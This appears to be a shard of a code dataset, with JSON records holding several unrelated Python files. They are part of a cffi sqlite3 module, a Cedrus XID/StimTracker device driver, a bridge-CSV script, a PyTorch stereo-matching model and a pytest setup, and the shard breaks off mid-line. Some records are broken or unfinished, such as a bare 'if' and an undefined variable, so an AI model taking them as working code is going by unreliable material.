try:\n num_params = len(params)\n except TypeError:\n num_params = -1\n if num_params != num_params_needed:\n raise ProgrammingError(\"Incorrect number of bindings supplied. \"\n \"The current statement uses %d, and \"\n \"there are %d supplied.\" %\n (num_params_needed, num_params))\n for i in range(num_params):\n rc = self.__set_param(i + 1, params[i])\n if rc != _lib.SQLITE_OK:\n raise InterfaceError(\"Error binding parameter %d - \"\n \"probably unsupported type.\" % i)\n elif isinstance(params, dict):\n for i in range(1, num_params_needed + 1):\n param_name = _lib.sqlite3_bind_parameter_name(self._statement, i)\n if not param_name:\n raise ProgrammingError(\"Binding %d has no name, but you \"\n \"supplied a dictionary (which has \"\n \"only names).\" % i)\n param_name = _ffi.string(param_name).decode('utf-8')[1:]\n try:\n param = params[param_name]\n except KeyError:\n raise ProgrammingError(\"You did not supply a value for \"\n \"binding %d.\" % i)\n rc = self.__set_param(i, param)\n if rc != _lib.SQLITE_OK:\n raise InterfaceError(\"Error binding parameter :%s - \"\n \"probably unsupported type.\" %\n param_name)\n else:\n raise ValueError(\"parameters are of unsupported type\")\n\n def _get_description(self):\n if self._type in (\n _STMT_TYPE_INSERT,\n _STMT_TYPE_UPDATE,\n _STMT_TYPE_DELETE,\n _STMT_TYPE_REPLACE\n ):\n return None\n desc = []\n for i in xrange(_lib.sqlite3_column_count(self._statement)):\n name = _lib.sqlite3_column_name(self._statement, i)\n if name:\n name = _ffi.string(name).decode('utf-8').split(\"[\")[0].strip()\n desc.append((name, None, None, None, None, None, None))\n return desc\n\n\nclass Row(object):\n def __init__(self, cursor, values):\n self.description = cursor.description\n self.values = values\n\n def __len__(self):\n return len(self.values)\n\n def __getitem__(self, item):\n if isinstance(item, (int, long)):\n return self.values[item]\n else:\n item = item.lower()\n for idx, desc in enumerate(self.description):\n if desc[0].lower() == item:\n return self.values[idx]\n raise IndexError(\"No item with that key\")\n\n def keys(self):\n return [desc[0] for desc in self.description]\n\n def __eq__(self, other):\n if not isinstance(other, Row):\n return NotImplemented\n if self.description != other.description:\n return False\n if self.values != other.values:\n return False\n return True\n\n def __ne__(self, other):\n return not self == other\n\n def __hash__(self):\n return hash(tuple(self.description)) ^ hash(tuple(self.values))\n\n\ndef _check_remaining_sql(s):\n state = \"NORMAL\"\n for char in s:\n if char == chr(0):\n return 0\n elif char == '-':\n if state == \"NORMAL\":\n state = \"LINECOMMENT_1\"\n elif state == \"LINECOMMENT_1\":\n state = \"IN_LINECOMMENT\"\n elif char in (' ', '\\t'):\n pass\n elif char == '\\n':\n if state == \"IN_LINECOMMENT\":\n state = \"NORMAL\"\n elif char == '/':\n if state == \"NORMAL\":\n state = \"COMMENTSTART_1\"\n elif state == \"COMMENTEND_1\":\n state = \"NORMAL\"\n elif state == \"COMMENTSTART_1\":\n return 1\n elif char == '*':\n if state == \"NORMAL\":\n return 1\n elif state == \"LINECOMMENT_1\":\n return 1\n elif state == \"COMMENTSTART_1\":\n state = \"IN_COMMENT\"\n elif state == \"IN_COMMENT\":\n state = \"COMMENTEND_1\"\n else:\n if state == \"COMMENTEND_1\":\n state = \"IN_COMMENT\"\n elif state == \"IN_LINECOMMENT\":\n pass\n elif state == \"IN_COMMENT\":\n pass\n else:\n return 1\n return 0\n\n\ndef _convert_params(con, nargs, params):\n _params = []\n for i in range(nargs):\n typ = _lib.sqlite3_value_type(params[i])\n if typ == _lib.SQLITE_NULL:\n val = None\n elif typ == _lib.SQLITE_INTEGER:\n val = _lib.sqlite3_value_int64(params[i])\n val = int(val)\n elif typ == _lib.SQLITE_FLOAT:\n val = _lib.sqlite3_value_double(params[i])\n elif typ == _lib.SQLITE_TEXT:\n val = _lib.sqlite3_value_text(params[i])\n val = _ffi.string(val).decode('utf-8')\n elif typ == _lib.SQLITE_BLOB:\n blob = _lib.sqlite3_value_blob(params[i])\n blob_len = _lib.sqlite3_value_bytes(params[i])\n val = _BLOB_TYPE(_ffi.buffer(blob, blob_len)[:])\n else:\n raise NotImplementedError\n _params.append(val)\n return _params\n\n\ndef _convert_result(con, val):\n if val is None:\n _lib.sqlite3_result_null(con)\n elif isinstance(val, (bool, int, long)):\n _lib.sqlite3_result_int64(con, int(val))\n elif isinstance(val, float):\n _lib.sqlite3_result_double(con, val)\n elif isinstance(val, unicode):\n val = val.encode('utf-8')\n _lib.sqlite3_result_text(con, val, len(val), _SQLITE_TRANSIENT)\n elif isinstance(val, str):\n _lib.sqlite3_result_text(con, val, len(val), _SQLITE_TRANSIENT)\n elif isinstance(val, (buffer, bytes)):\n _lib.sqlite3_result_blob(con, bytes(val), len(val), _SQLITE_TRANSIENT)\n else:\n raise NotImplementedError\n\n\ndef _function_callback(real_cb, context, nargs, c_params):\n params = _convert_params(context, nargs, c_params)\n try:\n val = real_cb(*params)\n except Exception:\n msg = b\"user-defined function raised exception\"\n _lib.sqlite3_result_error(context, msg, len(msg))\n else:\n _convert_result(context, val)\n\nconverters = {}\nadapters = {}\n\n\nclass PrepareProtocol(object):\n pass\n\n\ndef register_adapter(typ, callable):\n adapters[typ, PrepareProtocol] = callable\n\n\ndef register_converter(name, callable):\n converters[name.upper()] = callable\n\n\ndef register_adapters_and_converters():\n def adapt_date(val):\n return val.isoformat()\n\n def adapt_datetime(val):\n return val.isoformat(\" \")\n\n def convert_date(val):\n return datetime.date(*map(int, val.split(\"-\")))\n\n def convert_timestamp(val):\n datepart, timepart = val.split(\" \")\n year, month, day = map(int, datepart.split(\"-\"))\n timepart_full = timepart.split(\".\")\n hours, minutes, seconds = map(int, timepart_full[0].split(\":\"))\n if len(timepart_full) == 2:\n microseconds = int(timepart_full[1])\n else:\n microseconds = 0\n return datetime.datetime(year, month, day, hours, minutes, seconds,\n microseconds)\n\n register_adapter(datetime.date, adapt_date)\n register_adapter(datetime.datetime, adapt_datetime)\n register_converter(\"date\", convert_date)\n register_converter(\"timestamp\", convert_timestamp)\n\n\ndef adapt(val, proto=PrepareProtocol):\n # look for an adapter in the registry\n adapter = adapters.get((type(val), proto), None)\n if adapter is not None:\n return adapter(val)\n\n # try to have the protocol adapt this object\n if hasattr(proto, '__adapt__'):\n try:\n adapted = proto.__adapt__(val)\n except TypeError:\n pass\n else:\n if adapted is not None:\n return adapted\n\n # and finally try to have the object adapt itself\n if hasattr(val, '__conform__'):\n try:\n adapted = val.__conform__(proto)\n except TypeError:\n pass\n else:\n if adapted is not None:\n return adapted\n\n return val\n\nregister_adapters_and_converters()\n"} {"ext": "py", "sha": "1a3089150d570566c808011e5a62c579a5185fc9", "content": "# -*- coding: utf-8 -*-\nfrom serial.serialutil import SerialException\nfrom struct import unpack\n\nfrom .serial_wrapper import SerialPort\nfrom .constants import NO_KEY_DETECTED\nfrom .internal import XidConnection\nfrom .keymaps import (rb_530_keymap, rb_730_keymap, rb_830_keymap,\n rb_834_keymap, lumina_keymap)\n\n\nclass XidScanner(object):\n \"\"\"\n Scan the computer for connected XID devices\n \"\"\"\n def __init__(self):\n self.__com_ports = SerialPort.available_ports()\n self.__xid_cons = []\n self.detect_xid_devices()\n\n def detect_xid_devices(self):\n \"\"\"\n For all of the com ports connected to the computer, send an\n XID command '_c1'. If the device response with '_xid', it is\n an xid device.\n \"\"\"\n self.__xid_cons = []\n\n for c in self.__com_ports:\n device_found = False\n for b in [115200, 19200, 9600, 57600, 38400]:\n con = XidConnection(c, b)\n\n try:\n con.open()\n except SerialException:\n continue\n\n con.flush_input()\n con.flush_output()\n returnval = con.send_xid_command(\"_c1\", 5).decode('ASCII')\n\n if returnval.startswith('_xid'):\n device_found = True\n self.__xid_cons.append(con)\n\n if(returnval != '_xid0'):\n # set the device into XID mode\n con.send_xid_command('c10')\n con.flush_input()\n con.flush_output()\n\n # be sure to reset the timer to avoid the 4.66 hours\n # problem. (refer to XidConnection.xid_input_found to\n # read about the 4.66 hours)\n con.send_xid_command('e1')\n con.send_xid_command('e5')\n\n con.close()\n if device_found:\n break\n\n def device_at_index(self, index):\n \"\"\"\n Returns the device at the specified index\n \"\"\"\n if index >= len(self.__xid_cons):\n raise ValueError(\"Invalid device index\")\n\n return self.__xid_cons[index]\n\n def device_count(self):\n \"\"\"\n Number of XID devices connected to the computer\n \"\"\"\n return len(self.__xid_cons)\n\n\nclass BaseDevice(object):\n def __init__(self, connection, name=\"Unknown XID Device\"):\n self.con = connection\n self.device_name = name\n\n def reset_rt_timer(self):\n \"\"\"\n Resets the Reaction Time timer.\n \"\"\"\n self.con.send_xid_command(\"e5\")\n\n def reset_base_timer(self):\n \"\"\"\n Resets the base timer\n \"\"\"\n self.con.send_xid_command(\"e1\")\n\n def query_base_timer(self):\n \"\"\"\n gets the value from the device's base timer\n \"\"\"\n (_, _, time) = unpack('' % self.device_name\n\n\nclass StimTracker(BaseDevice):\n \"\"\"\n Class that encapsulates the StimTracker device.\n\n The pulse duration defaults to 100ms. To change this, call\n StimTracker.set_pulse_duration(duration_in_miliseconds)\n \"\"\"\n _lines = {1: 1,\n 2: 2,\n 3: 4,\n 4: 8,\n 5: 16,\n 6: 32,\n 7: 64,\n 8: 128}\n\n def __init__(self, connection, name=\"StimTracker\"):\n BaseDevice.__init__(self, connection, name)\n self.con.set_using_stim_tracker(True)\n self.con.send_xid_command('a10')\n self.con.clear_digital_output_lines(0xff)\n self.set_pulse_duration(100)\n\n def set_pulse_duration(self, duration):\n \"\"\"\n Sets the pulse duration for events in miliseconds when activate_line\n is called\n \"\"\"\n if duration > 4294967295:\n raise ValueError('Duration is too long. Please choose a value '\n 'less than 4294967296.')\n\n big_endian = hex(duration)[2:]\n if len(big_endian) % 2 != 0:\n big_endian = '0'+big_endian\n\n little_endian = []\n\n for i in range(0, len(big_endian), 2):\n little_endian.insert(0, big_endian[i:i+2])\n\n for i in range(0, 4-len(little_endian)):\n little_endian.append('00')\n\n command = 'mp'\n for i in little_endian:\n command += chr(int(i, 16))\n\n self.con.send_xid_command(command, 0)\n\n def activate_line(self, lines=None, bitmask=None,\n leave_remaining_lines=False):\n \"\"\"\n Triggers an output line on StimTracker.\n\n There are 8 output lines on StimTracker that can be raised in any\n combination. To raise lines 1 and 7, for example, you pass in\n the list: activate_line(lines=[1, 7]).\n\n To raise a single line, pass in just an integer, or a list with a\n single element to the lines keyword argument:\n\n activate_line(lines=3)\n\n or\n\n activate_line(lines=[3])\n\n The `lines` argument must either be an Integer, list of Integers, or\n None.\n\n If you'd rather specify a bitmask for setting the lines, you can use\n the bitmask keyword argument. Bitmask must be a Integer value between\n 0 and 255 where 0 specifies no lines, and 255 is all lines. For a\n mapping between lines and their bit values, see the `_lines` class\n variable.\n\n To use this, call the function as so to activate lines 1 and 6:\n\n activate_line(bitmask=33)\n\n leave_remaining_lines tells the function to only operate on the lines\n specified. For example, if lines 1 and 8 are active, and you make\n the following function call:\n\n activate_line(lines=4, leave_remaining_lines=True)\n\n This will result in lines 1, 4 and 8 being active.\n\n If you call activate_line(lines=4) with leave_remaining_lines=False\n (the default), if lines 1 and 8 were previously active, only line 4\n will be active after the call.\n \"\"\"\n if lines is None and bitmask is None:\n raise ValueError('Must set one of lines or bitmask')\n if lines is not None and bitmask is not None:\n raise ValueError('Can only set one of lines or bitmask')\n\n if bitmask is not None:\n if bitmask not in range(0, 256):\n raise ValueError('bitmask must be an integer between '\n '0 and 255')\n\n if lines is not None:\n if not isinstance(lines, list):\n lines = [lines]\n\n bitmask = 0\n for l in lines:\n if l < 1 or l > 8:\n raise ValueError('Line numbers must be between 1 and 8 '\n '(inclusive)')\n bitmask |= self._lines[l]\n\n self.con.set_digital_output_lines(bitmask, leave_remaining_lines)\n\n def clear_line(self, lines=None, bitmask=None,\n leave_remaining_lines=False):\n \"\"\"\n The inverse of activate_line. If a line is active, it deactivates it.\n\n This has the same parameters as activate_line()\n \"\"\"\n if lines is None and bitmask is None:\n raise ValueError('Must set one of lines or bitmask')\n if lines is not None and bitmask is not None:\n raise ValueError('Can only set one of lines or bitmask')\n\n if bitmask is not None:\n if bitmask not in range(0, 256):\n raise ValueError('bitmask must be an integer between '\n '0 and 255')\n\n if lines is not None:\n if not isinstance(lines, list):\n lines = [lines]\n\n bitmask = 0\n for l in lines:\n if l < 1 or l > 8:\n raise ValueError('Line numbers must be between 1 and 8 '\n '(inclusive)')\n bitmask |= self._lines[l]\n\n self.con.clear_digital_output_lines(bitmask, leave_remaining_lines)\n\n def __str__(self):\n return '' % self.device_name\n\n def __repr__(self):\n return self.__str__()\n\n\nclass XidError(Exception):\n pass\n\n\nclass XidDevice(object):\n \"\"\"\n Class for interfacing with a Cedrus XID device.\n\n At the beginning of an experiment, the developer should call:\n\n XidDevice.reset_base_timer()\n\n Whenever a stimulus is presented, the developer should call:\n\n XidDevice.reset_rt_timer()\n\n Developers Note: Currently there is a known issue of clock drift\n in the XID devices. Due to this, the dict returned by\n XidDevice.get_next_response() returns 0 for the reaction time value.\n\n This issue will be resolved in a future release of this library.\n \"\"\"\n def __init__(self, xid_connection):\n self.con = xid_connection\n self._impl = None\n self.init_device()\n\n def __del__(self):\n self.con.close()\n del self.con\n\n def is_stimtracker(self):\n return isinstance(self._impl, StimTracker)\n\n def is_response_device(self):\n return isinstance(self._impl, ResponseDevice)\n\n def init_device(self):\n \"\"\"\n Initializes the device with the proper keymaps and name\n \"\"\"\n try:\n product_id = int(self._send_command('_d2', 1))\n except ValueError:\n product_id = self._send_command('_d2', 1)\n\n if product_id == 0:\n self._impl = ResponseDevice(\n self.con,\n 'Cedrus Lumina LP-400 Response Pad System',\n lumina_keymap)\n elif product_id == 1:\n self._impl = ResponseDevice(\n self.con,\n 'Cedrus SV-1 Voice Key',\n None,\n 'Voice Response')\n elif product_id == 2:\n model_id = int(self._send_command('_d3', 1))\n if model_id == 1:\n self._impl = ResponseDevice(\n self.con,\n 'Cedrus RB-530',\n rb_530_keymap)\n elif model_id == 2:\n self._impl = ResponseDevice(\n self.con,\n 'Cedrus RB-730',\n rb_730_keymap)\n elif model_id == 3:\n self._impl = ResponseDevice(\n self.con,\n 'Cedrus RB-830',\n rb_830_keymap)\n elif model_id == 4:\n self._impl = ResponseDevice(\n self.con,\n 'Cedrus RB-834',\n rb_834_keymap)\n else:\n raise XidError('Unknown RB Device')\n elif product_id == 4:\n self._impl = StimTracker(\n self.con,\n 'Cedrus C-POD')\n elif product_id == b'S':\n self._impl = StimTracker(\n self.con,\n 'Cedrus StimTracker')\n\n elif product_id == -99:\n raise XidError('Invalid XID device')\n\n def _send_command(self, command, expected_bytes):\n \"\"\"\n Send an XID command to the device\n \"\"\"\n response = self.con.send_xid_command(command, expected_bytes)\n\n return response\n\n def __getattr__(self, attrname):\n return getattr(self._impl, attrname)\n\n def __repr__(self):\n if self._impl is not None:\n return str(self._impl)\n else:\n return 'Uninitialized XID device'\n"} {"ext": "py", "sha": "1a30897fffd3f594588bafc0f4bc881cbfbae8b0", "content": "import csv\nimport requests\ndf = open(\"bridgeData3.csv\",'r').readlines()\nfin = open('final.csv','r').readlines()\nfinCsv = fin[1:]\n# url = https://b2ptc.herokuapp.com/bridges\nfinalCsv = df[1:]\nobj = {}\nfor i in finalCsv:\n x = i.split(',')\n obj[x[1]] = {'bridge_name':x[0],'proj_code':x[1],'before_img':x[2],'after_img':x[3]}\n\nprint(finCsv[0]) \nfor i in finCsv:\n if \n \n# for i in finalCsv:\n# x = i.split(',')\n# requests.put(url+x[0],data={before:x[2],after:x[3]})\n# pull each id,before image and after from df\n# for each data item do a put request with the id as the param id \n# and then put the before and after image in an dict and place it as the data for the put request\n"} {"ext": "py", "sha": "1a308a2587ccd68fe03943fc982dc858bb9631a3", "content": "# -*- coding: utf-8 -*-\n# @Author: yulidong\n# @Date: 2018-07-17 10:44:43\n# @Last Modified by: yulidong\n# @Last Modified time: 2018-08-27 18:45:39\n# -*- coding: utf-8 -*-\n# @Author: lidong\n# @Date: 2018-03-20 18:01:52\n# @Last Modified by: yulidong\n# @Last Modified time: 2018-07-16 22:16:14\nimport time\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport math\nfrom math import ceil\nfrom torch.autograd import Variable\nfrom torch.nn.functional import cosine_similarity as cosine_s\nfrom pssm import caffe_pb2\nfrom pssm.models.utils import *\nrsn_specs = {\n 'scene': \n {\n 'n_classes': 9,\n 'input_size': (540, 960),\n 'block_config': [3, 4, 23, 3],\n },\n\n}\n\ngroup_dim=8\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n\n if stride==1:\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n if stride==2:\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=2, bias=False) \nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.gn1 = nn.GroupNorm(group_dim,planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(planes, planes)\n self.gn2 = nn.GroupNorm(group_dim,planes)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.gn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.gn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n # print(residual.shape)\n # print(out.shape)\n out += residual\n out = self.relu(out)\n\n return out\nclass feature_extraction(nn.Module):\n def __init__(self):\n super(feature_extraction, self).__init__()\n self.inplanes = 32\n self.layer1 = self._make_layer(BasicBlock, 32, 3, 1,1,1)\n\n self.branch1 = nn.Sequential(nn.AvgPool2d((54, 96), stride=(54,96)),\n nn.Conv2d(32, 8, 1, 1, 0, 1),\n nn.GroupNorm(4,8),\n nn.ReLU(inplace=True))\n\n self.branch2 = nn.Sequential(nn.AvgPool2d((27, 48), stride=(27,48)),\n nn.Conv2d(32, 8, 1, 1, 0, 1),\n nn.GroupNorm(4,8),\n nn.ReLU(inplace=True))\n\n self.branch3 = nn.Sequential(nn.AvgPool2d((36, 64), stride=(36,64)),\n nn.Conv2d(32, 8, 1, 1, 0, 1),\n nn.GroupNorm(4,8),\n nn.ReLU(inplace=True))\n\n self.branch4 = nn.Sequential(nn.AvgPool2d((18, 32), stride=(18,32)),\n nn.Conv2d(32, 8, 1, 1, 0, 1),\n nn.GroupNorm(4,8),\n nn.ReLU(inplace=True))\n self.branch5 = nn.Sequential(nn.AvgPool2d((9, 16), stride=(9,16)),\n nn.Conv2d(32, 8, 1, 1, 0, 1),\n nn.GroupNorm(4,8),\n nn.ReLU(inplace=True))\n self.branch6 = nn.Sequential(nn.AvgPool2d((3, 8), stride=(3,8)),\n nn.Conv2d(32, 8, 1, 1, 0, 1),\n nn.GroupNorm(4,8),\n nn.ReLU(inplace=True))\n\n\n self.lastconv = nn.Sequential(nn.Conv2d(80, 64, 3, 1, 1, 1),\n nn.GroupNorm(group_dim,64),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 32, 3, 1, 1, 1),\n nn.GroupNorm(group_dim,32),\n nn.ReLU(inplace=True), \n )\n\n def _make_layer(self, block, planes, blocks, stride, pad, dilation):\n downsample = None\n\n layers = []\n layers.append(block(self.inplanes, planes, stride))\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes,1))\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n # output = self.conv1(x)\n # output = self.gn1(output)\n # output = self.relu1(output)\n # output = self.conv2(output)\n # output = self.gn2(output)\n # output = self.relu2(output)\n # output = self.conv3(output)\n # output = self.gn3(output)\n # output = self.relu3(output)\n output_skip = self.layer1(x)\n # output_skip=x\n\n output_branch1 = self.branch1(output_skip)\n output_branch1 = F.interpolate(output_branch1, (output_skip.size()[2],output_skip.size()[3]),mode='bilinear',align_corners=True)\n\n output_branch2 = self.branch2(output_skip)\n output_branch2 = F.interpolate(output_branch2, (output_skip.size()[2],output_skip.size()[3]),mode='bilinear',align_corners=True)\n\n output_branch3 = self.branch3(output_skip)\n output_branch3 = F.interpolate(output_branch3, (output_skip.size()[2],output_skip.size()[3]),mode='bilinear',align_corners=True)\n\n output_branch4 = self.branch4(output_skip)\n output_branch4 = F.interpolate(output_branch4, (output_skip.size()[2],output_skip.size()[3]),mode='bilinear',align_corners=True)\n\n output_branch5 = self.branch5(output_skip)\n output_branch5 = F.interpolate(output_branch5, (output_skip.size()[2],output_skip.size()[3]),mode='bilinear',align_corners=True)\n\n output_branch6 = self.branch6(output_skip)\n output_branch6 = F.interpolate(output_branch6, (output_skip.size()[2],output_skip.size()[3]),mode='bilinear',align_corners=True)\n\n output_feature = torch.cat((output_skip, output_branch6, output_branch5, output_branch4, output_branch3, output_branch2, output_branch1), 1)\n output_feature = self.lastconv(output_feature)\n #print(output_feature.shape)\n return output_feature\n\nclass feature_extraction2(nn.Module):\n def __init__(self):\n super(feature_extraction2, self).__init__()\n self.inplanes = 32\n self.conv1 = nn.Conv2d(3, 32, kernel_size=3, stride=1, padding=1,\n bias=False,dilation=1)\n self.gn1 = nn.GroupNorm(group_dim,32)\n self.relu1 = nn.ReLU(inplace=True)\n self.conv2 = nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1,\n bias=False,dilation=1)\n self.gn2 = nn.GroupNorm(group_dim,32)\n self.relu2 = nn.ReLU(inplace=True)\n self.conv3 = nn.Conv2d(32, 32, kernel_size=7, stride=1, padding=6,\n bias=False,dilation=2)\n self.gn3 = nn.GroupNorm(group_dim,32)\n self.relu3 = nn.ReLU(inplace=True)\n self.layer1 = self._make_layer(BasicBlock, 32, 1, 1,1,1)\n\n def _make_layer(self, block, planes, blocks, stride, pad, dilation):\n downsample = None\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes,1,None,))\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n output = self.conv1(x)\n output = self.gn1(output)\n output = self.relu1(output)\n output = self.conv2(output)\n output = self.gn2(output)\n output = self.relu2(output)\n output = self.conv3(output)\n output = self.gn3(output)\n output = self.relu3(output)\n #print(output.shape)\n output = self.layer1(output)\n\n\n return output\n\nclass ss_argmin(nn.Module):\n def __init__(self):\n super(ss_argmin, self).__init__()\n self.softmax = nn.Softmax(dim=-1)\n\n\n\n def forward(self,x,min,max):\n one=torch.ones(1)\n zero=torch.zeros(1)\n x=self.softmax(x)\n index=torch.ones_like(x)*torch.range(min,max)\n disparity= torch.sum(x*index,dim=-1)\n v,i=torch.topk(x,k=1,dim=-1)\n mask_1=torch.squeeze(torch.where(v>0.7,one,zero))\n v,i=torch.topk(x,k=5,dim=-1)\n v_sum=torch.sum(v,-1)\n mask_2=torch.squeeze(torch.where(v_s>0.7,one,zero))\n i_dis=torch.max(i,-1)[0]-torch.min(i,-1)[0]\n mask_3=torch.squeeze(torch.where(i_dis<6,one,zero))\n mask=mask_1+mask_2*mask_3\n mask=torch.where(mask>0,one,zero)\n return disparity*mask\n\n\n\nclass rstereo(nn.Module):\n\n\n def __init__(self, \n n_classes=9, \n block_config=[3, 4, 6, 3], \n input_size= (480, 640), \n version='scene'):\n\n super(rstereo, self).__init__()\n self.feature_extraction=feature_extraction().cuda(0)\n self.feature_extraction2=feature_extraction2().cuda(0)\n # self.aggregation_sparse=aggregation_sparse()\n # self.aggregation_dense=aggregation_dense() \n self.ss_argmin=ss_argmin()\n # self.refinement_sparse=aggregation_sparse()\n # self.refinement_dense=aggregation_dense() \n\n def crop(self,x):\n index=(x==1).nonzero()\n return torch.min(index[:,0]),torch.max(index[:,0])+1,torch.min(index[:,1]),torch.max(index[:,1]+1)\n def cluster(feature,mask):\n count=torch.sum(mask)\n mean=torch.sum(torch.sum(feature,dim=-1),dim=-1)/count\n weights=torch.where(mask==ones,torch.norm(feature-mean,dim=1),zeros)\n weights=torch.exp(weights/torch.max(weights)).view(weights.shape[0],weights.shape[1],1)\n return weights\n def forward(self, l,r,P,pre1,pre2):\n #self.P=P[1,0]\n #0 l to r,1 min,2 max\n #[l_box,r_box,match],[min_d,max_d]\n self.pre=pre1\n self.pre2=pre2\n P1=P[...,0]\n P2=P[...,3]\n P3=P[...,1]\n P4=P[...,2]\n #feature extraction\n l_mask=P2-P1\n s_mask=P1\n #l_mask=l_mask.byte()\n #s_mask=s_mask.byte()\n #basic cuda 524\n #print(l.type)\n #1923\n #print(torch.cuda.memory_allocated(1))\n #2727\n l_sf=self.feature_extraction2(l)\n l_lf=self.feature_extraction(l_sf)\n\n #print(torch.cuda.memory_allocated(2))\n #the cuda won't copy the volume to the new gpu\n # a=l_lf.cuda(1)\n # b=l_lf.cuda(2)\n # c=l_sf.cuda(3)\n r_sf=self.feature_extraction2(r)\n r_lf=self.feature_extraction(r_sf)\n #print(torch.cuda.memory_allocated(1))\n #3267\n \n #print(torch.cuda.memory_allocated(2))\n #reshape the mask to batch and channel\n\n disparity=torch.zeros([540,960]).cuda(2)\n one=torch.ones(1).cuda(2)\n zero=torch.zeros(1).cuda(2)\n cost_volume=[]\n #5710\n #print(value)\n l_lf=l_lf.cuda(2)\n r_lf=r_lf.cuda(2)\n r_sf=r_sf.cuda(2)\n l_sf=l_sf.cuda(2)\n #985\n #feature=torch.masked_select(l_sf,s_mask)\n #feature=torch.masked_select(l_lf,l_mask)+torch.masked_select(l_sf,s_mask)\n feature=l_lf*l_mask+l_sf*s_mask\n feature=torch.where((l_mask+s_mask)>0,feature,l_lf)\n\n s_match=s_mask.long().nonzero()\n s_feature=l_sf[...,s_match[:,0],s_match[:,1]]\n l_match=l_mask.long().nonzero()\n l_feature=l_lf[...,l_match[:,0],l_match[:,1]]\n start_time=time.time()\n\n #0.0003\n #s_r_o_t=r_sf[...,s_match[:,0],s_match[:,1]]\n #1,32,n\n #print(time.time()-start_time)\n #print(s_match.shape)\n #time 10\n # for i in range(s_match.shape[0]):\n # min_d=torch.max(s_match[i,1]-300,zero.long())\n # #print(min_d)\n # s_r_o_t=r_sf[...,s_match[i,0],min_d:s_match[i,1]]\n \n # a=s_feature[...,i].view(1,32,1)\n # #print(a.shape,s_r_o_t.shape)\n # cost_volume.append(torch.where(s_match[i,1]-300>=0,cosine_s(a,s_r_o_t),zero))\n #time 0.23,192,0.035,30, the number of the match points won't influence the time,only the iteration\n\n # for i in range(300):\n # s_r_o_t=r_sf[...,s_match[:,0],s_match[:,1]-i]\n # cost_volume.append(torch.where(s_match[:,1]-i>=0,cosine_s(s_feature,s_r_o_t),zero))\n # l_r_o_t=r_sf[...,l_match[:,0],l_match[:,1]-i]\n # cost_volume.append(torch.where(l_match[:,1]-i>=0,cosine_s(l_feature,l_r_o_t),zero)) \n # #cost_volume=torch.stack(cost_volume)\n # print(torch.cuda.memory_allocated(2))\n # print(time.time()-start_time)\n # time.sleep(100)\n \n #promotion\n #we can segment with bounding box and divide the whole image into many parts\n #each single bounding box will be managed through network not the whole image\n #matching cost computation\n count=0\n start_time=time.time()\n for i in range(torch.max(P3).type(torch.int32)+1):\n #ground 0-270, sky 0-40\n # if i==13 or i == 14:\n # continue\n # i=60\n #print(pre2.shape)\n #i=14\n min_d=pre1[0,0,i].long()\n max_d=pre1[0,1,i].long()\n object_mask=torch.where(P3==i,one,zero)\n x1,y1,x2,y2,size=pre2[0,i].long()\n object_mask=object_mask[0,x1:x2,y1:y2]\n s_mask_o=object_mask*s_mask[0,x1:x2,y1:y2]\n l_mask_o=object_mask*l_mask[0,x1:x2,y1:y2]\n s_match=s_mask_o.long().nonzero()\n l_match=l_mask_o.long().nonzero()\n if s_match.shape[0]==0:\n s_match=object_mask.nonzero()\n if l_match.shape[0]==0:\n l_match=object_mask.nonzero()\n s_l_o=feature[...,s_match[:,0],s_match[:,1]]\n l_l_o=feature[...,l_match[:,0],l_match[:,1]]\n #print(torch.max(min_d,zero).long())\n #s_r_o=feature[...,s_match[:,0],s_match[:,1]]\n\n # s_r_o=r_sf[...,x1:x2,y1-max_d:y2-min_d]\n # l_r_o=r_lf[...,x1:x2,y1-max_d:y2-min_d]\n cost_s=[]\n cost_l=[]\n #ground and sky\n #print(s_match.shape[0],l_match.shape[0],min_d,max_d)\n \n for j in range(min_d,max_d):\n s_r_o_t=r_sf[...,s_match[:,0],s_match[:,1]-j]\n cost_s.append(torch.where(s_match[:,1]-j>=0,cosine_s(s_l_o,s_r_o_t),zero))\n l_r_o_t=r_lf[...,l_match[:,0],l_match[:,1]-j]\n cost_l.append(torch.where(l_match[:,1]-j>=0,cosine_s(l_l_o,l_r_o_t),zero))\n cost_s=torch.stack(cost_s,-1)\n cost_l=torch.stack(cost_l,-1)\n \n #cost_volume=cost_s+cost_l\n #print(torch.cuda.memory_allocated(2)/1e+6)\n #time.sleep(30)\n print(time.time()-start_time)\n time.sleep(100)\n return cost_volume\n\n\n"} {"ext": "py", "sha": "1a308d089d78cb73121ee6479a4167fb0f4c76a3", "content": "import pytest\nimport random\nimport tensorflow as tf\nfrom run import run\nfrom main import main\nimport os\nimport json\nimport shutil\ncwd = os.path.abspath(os.path.dirname(__file__))\npath = os.path.join(cwd, '..', 'cotk')\n\ndef setup_function(function):\n\timport sys\n\tsys.argv = ['python3']\n\trandom.seed(0)\n\timport numpy as np\n\tnp.random.seed(0)\n\ttf.set_random_seed(0)\n\ttry:\n\t\tshutil.rmtree(cwd + '/output_test')\n\texcept Exception:\n\t\tpass\n\ttry:\n\t\tshutil.rmtree(cwd + '/tensorboard_test')\n\texcept Exception:\n\t\tpass\n\ttry:\n\t\tshutil.rmtree(cwd + '/model_test')\n\texcept Exception:\n\t\tpass\n\ttry:\n\t\tshutil.rmtree(cwd + '/cache_test')\n\texcept Exception:\n\t\tpass\n\tos.mkdir(cwd + '/output_test')\n\tos.mkdir(cwd + 